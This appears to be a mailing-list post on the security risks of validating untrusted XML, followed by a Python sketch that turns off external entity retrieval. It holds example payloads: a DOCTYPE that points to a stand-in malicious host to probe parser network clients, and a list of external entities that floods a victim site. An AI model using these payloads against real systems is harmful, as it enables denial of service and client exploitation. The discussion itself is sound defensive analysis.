Malicious documents? (WAS: Interesting mailing list & a rare broadside)
James Clark wrote,
> Suppose an application is trying to use validation to protect itself
> from bad input. It carefully loads the schema cache with the
> namespaces it knows about, and calls validate(). Now the bad guy
> comes along and uses a root element from some other namespace and
> uses xsi:schemaLocation to point to his own schema that has a
> declaration for that element and uses <xs:any namespace="##any"
> processContents="skip"/>. Won't they just have almost completely
> undermined any protection that was supposed to come from validation?

This is at least partly related to something that's been worrying me on and off for quite a while now. It seems like a fairly obvious worry, but I don't recall seeing any explicit discussion of it here (or anywhere else for that matter).

Many (most?) off-the-shelf XML parsers, at least when validating, will by default attempt to retrieve external subsets and other entities via their system ids. This implies that an arbitrary XML document instance, whether from a trusted or untrusted source, can cause an XML processor to make network connections to any host on any port using any protocol for which retrieval is supported by the network client associated with the XML processor.

This opens up at least two, possibly more, kinds of attack,

* Exploiting vulnerabilities in network clients.

  A malicious host might submit the following kind of document instance to an XML processor,

    <?xml version="1.0"?>
    <!DOCTYPE foo SYSTEM "http://www.malicious-host.com/evil-uri">
    <foo/>

  The server at www.malicious-host.com could return a response carefully crafted to exploit weaknesses in the victim XML processor's network client.

* Using XML processors for denial of service attacks.

  Consider the following document instance,

    <?xml version="1.0"?>
    <!DOCTYPE foo [
      <!ENTITY hit-1 SYSTEM "http://www.victim.org/victim-uri1">
      <!ENTITY hit-2 SYSTEM "http://www.victim.org/victim-uri2">
      <!-- repeat ad nauseam ... -->
      <!ENTITY hit-n-1 SYSTEM "http://www.victim.org/victim-uri-n-1">
      <!ENTITY hit-n SYSTEM "http://www.victim.org/victim-uri-n">
    ]>
    <foo>
      &hit-1;
      &hit-2;
      <!-- repeat ad nauseam ... -->
      &hit-n-1;
      &hit-n;
    </foo>

  When presented with such a document an unwitting XML processor might proceed to clobber www.victim.org.

If anyone can come up with variations on this theme I'd be extremely interested to hear about them.

There are, I think, a couple of conclusions to draw from the examples above. First, that validating untrusted documents, rather than protecting receiving applications, might actually be quite a dangerous activity. Second, that in some contexts XML document instances might be better thought of as being closer to active content than to text/plain, thanks to the implicit retrieval semantics of references to external entities.

Neither of these conclusions is particularly surprising, and in some respects they've been discussed here before under the heading of XML application robustness. For example, a related case would be the runtime configuration file,

  <?xml version="1.0"?>
  <!DOCTYPE foo SYSTEM "http://www.unwise.com/config.dtd">
  <foo/>

for an application which insists on validating its configuration on startup, but doesn't maintain a locally cached copy of the DTD: after the 10,000th sale the server at www.unwise.com collapses under the strain of 10,000 requests for config.dtd at 9am, leading to all installations of the application failing. There's also a privacy issue here: the DTD retrieval could be construed as the application "phoning home".

Thoughts?

Cheers,

Miles
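
As a rough illustration of one way a receiving application might guard against the retrieval behaviour described above, the sketch below parses an untrusted document with external entity retrieval switched off. It uses Python's standard xml.sax module, which is an assumption made purely for illustration: it is expat-based and non-validating, and is not something the message itself refers to. The names parse_untrusted, RefusingResolver and ElementNames are hypothetical.

```python
import io
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    EntityResolver,
    feature_external_ges,
    feature_external_pes,
)


class RefusingResolver(EntityResolver):
    """Hypothetical safety net: record any system id the parser asks for
    and refuse to fetch it, so nothing is ever retrieved over the network."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        raise xml.sax.SAXException("external entity refused: %s" % systemId)


class ElementNames(ContentHandler):
    """Collect element names, just to show that parsing still completes."""

    def __init__(self):
        super().__init__()
        self.names = []

    def startElement(self, name, attrs):
        self.names.append(name)


def parse_untrusted(xml_bytes):
    """Parse xml_bytes without retrieving external subsets or entities.

    Returns (element names seen, system ids the parser tried to resolve).
    """
    parser = xml.sax.make_parser()
    # Do not include external general entities (the &hit-n; case) ...
    parser.setFeature(feature_external_ges, False)
    # ... nor external parameter entities.
    parser.setFeature(feature_external_pes, False)

    resolver = RefusingResolver()
    handler = ElementNames()
    parser.setEntityResolver(resolver)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.names, resolver.requested
```

With both features off, references such as &hit-1; are skipped rather than fetched, and the refusing resolver is only a second line of defence in case a parser consults it anyway. Note that this avoids the retrieval problem by giving up DTD validation altogether; an application that still needs to validate would presumably have to resolve system ids against locally cached copies instead.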